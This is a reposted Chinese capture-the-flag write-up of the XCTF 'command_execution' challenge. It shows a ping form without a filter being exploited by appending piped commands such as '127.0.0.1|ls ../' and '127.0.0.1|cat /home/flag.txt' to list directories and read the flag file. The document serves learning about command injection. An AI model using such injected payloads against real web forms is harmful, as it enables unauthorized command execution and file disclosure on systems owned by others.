ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

12、XCTF command_execution

2021-09-17 00:02:37  阅读:123  来源: 互联网

标签:12 target .. 0.1 flag 127.0 command ls execution


一打开网站,就看到下面这句话
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
在框框里面输

127.0.0.1

有反应,看了一下,返回的数据,感觉是linux
ls,看一下。
可以,那就是linux,
(后面用dir,发现也可以)
反正是可以执行,无所谓了,
先查找文件,用hackbar

target=127.0.0.1|find / -name flag.txt

找到了,/home/flag.txt
去找他们在那个目录,
用ls去查一下有什么文件

127.0.0.1|ls

得到

index.php

hackbar,

http://111.200.241.244:65287/
Post data
target=127.0.0.1|ls ../

得到html

target=127.0.0.1|ls ../../

得到

backups、cache、lib、local、lock、log、mail、opt、
run、spool、tmp、www
target=127.0.0.1|ls ../../../
bin、boot、dev、etc、home、lib、lib64、media、mnt、
opt、proc、root、run、run.sh、sbin、srv、sys、tmp、
usr、var

找到了,直接去访问,

target=127.0.0.1|ls ../../../home
flag.txt
target=127.0.0.1|cat ../../../home/flag.txt

获得flag
(后面发现直接访问,也可以,尴尬,target=127.0.0.1|cat /home/flag.txt
基础知识:

|                       //显示B的执行结果
&                      //简单拼接,A B之间无制约关系

这题&用不了。

标签:12,target,..,0.1,flag,127.0,command,ls,execution
来源: https://blog.csdn.net/m0_53008479/article/details/120340020

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有